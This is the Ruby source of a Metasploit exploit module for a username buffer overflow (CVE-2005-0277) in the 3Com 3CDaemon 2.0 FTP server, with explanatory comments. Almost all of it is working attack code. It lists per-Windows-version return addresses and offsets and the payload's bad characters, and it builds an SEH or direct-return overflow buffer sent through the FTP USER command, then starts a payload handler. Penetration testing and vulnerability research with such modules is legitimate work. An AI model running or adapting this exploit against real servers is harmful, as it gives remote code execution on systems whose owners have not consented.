GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for the 3Com 3CDaemon 2.0 FTP server (CVE-2005-0277, see
# 'References' below).  The overflow is reached through the USER command;
# the module builds the USER argument from the selected target's 'Offset'
# and 'Ret' values.  The Ftp mixin supplies connect/disconnect, banner and
# send_cmd; the Seh mixin supplies generate_seh_payload.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::Seh

  # Registers module metadata: references, payload constraints and the
  # per-OS target table.  Each target carries a return address ('Ret') and
  # the distance into the USER argument ('Offset') at which it is placed.
  #
  # @param info [Hash] extra module info merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => '3Com 3CDaemon 2.0 FTP Username Overflow',
        'Description' => %q{
          This module exploits a vulnerability in the 3Com 3CDaemon
          FTP service. This package is being distributed from the 3Com
          web site and is recommended in numerous support documents.
          This module uses the USER command to trigger the overflow.
        },
        'Author' => [
          'hdm', # Original author
          'otr' # Windows XP SP3
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-0277'],
          [ 'OSVDB', '12810'],
          [ 'OSVDB', '12811'],
          [ 'BID', '12155']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'seh',
          'target' => 0
        },
        'Privileged' => false,
        'Payload' => {
          # Encoded payload must fit in 674 bytes and avoid the bytes below
          # (NUL, FTP/URL delimiters, whitespace and path separators), since
          # the argument travels in a single FTP command line.
          'Space' => 674,
          'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",
          'StackAdjustment' => -3500,
          'Compat' =>
            {
              # '-find' excludes find-socket style connection payloads.
              'ConnectionType' => '-find'
            }
        },
        # Targets 0-3 use the SEH path in #exploit (the SEH record is written
        # at 'Offset'); target 4 uses the direct return-address path.
        'Targets' => [
          [
            'Windows 2000 English', # Tested OK - hdm 11/24/2005
            {
              'Platform' => 'win',
              'Ret' => 0x75022ac4, # ws2help.dll
              'Offset' => 229
            },
          ],
          [
            'Windows XP English SP0/SP1',
            {
              'Platform' => 'win',
              'Ret' => 0x71aa32ad, # ws2help.dll
              'Offset' => 229
            },
          ],
          [
            'Windows NT 4.0 SP4/SP5/SP6',
            {
              'Platform' => 'win',
              'Ret' => 0x77681799, # ws2help.dll
              'Offset' => 229
            },
          ],
          [
            'Windows 2000 Pro SP4 French',
            {
              'Platform' => 'win',
              'Ret' => 0x775F29D0,
              'Offset' => 229
            },
          ],
          [
            # Index 4: selected by the `target == targets[4]` test in #exploit.
            'Windows XP English SP3',
            {
              'Platform' => 'win',
              'Ret' => 0x7CBD41FB, # 7CBD41FB JMP ESP shell32.data SP3
              # 'Ret' => 0x775C2C1F, # 775C2C1F JMP ESP shell32.data SP1
              'Offset' => 245
            },
          ],
        ],
        'DisclosureDate' => '2005-01-04',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Banner-based version check.  The Ftp mixin's connect stores the server
  # greeting in `banner`; nothing else is sent, so the socket is closed
  # before the match.  A matching version string only shows that the
  # affected product appears to be present (no overflow is attempted),
  # hence CheckCode::Appears rather than Vulnerable; anything else is
  # reported as Safe, which also covers a greeting that was customised.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    connect
    disconnect
    if (banner =~ /3Com 3CDaemon FTP Server Version 2\.0/)
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  # Builds the USER argument for the selected target and sends it.
  #
  # Two layouts are used.  For target index 4 (Windows XP SP3) the buffer
  # is 'Offset' bytes of filler, the return address twice (little-endian),
  # then the encoded payload.  For every other target a 2048-byte filler
  # has the record from generate_seh_payload written in at 'Offset'.
  # target.ret reads the same 'Ret' value as target['Ret'].
  #
  # @return [void]
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    if (target == targets[4])
      buf = rand_text_english(target['Offset'], payload_badchars)
      buf << [ target['Ret'] ].pack('V') * 2
      buf << payload.encoded
    else
      buf = rand_text_english(2048, payload_badchars)
      seh = generate_seh_payload(target.ret)
      buf[target['Offset'], seh.length] = seh
    end

    # NOTE(review): the second argument is false here — presumably this
    # suppresses waiting for an FTP reply; confirm against the Ftp mixin's
    # send_cmd signature.
    send_cmd(['USER', buf], false)

    # Start the payload handler before tearing down the control connection.
    handler
    disconnect
  end
end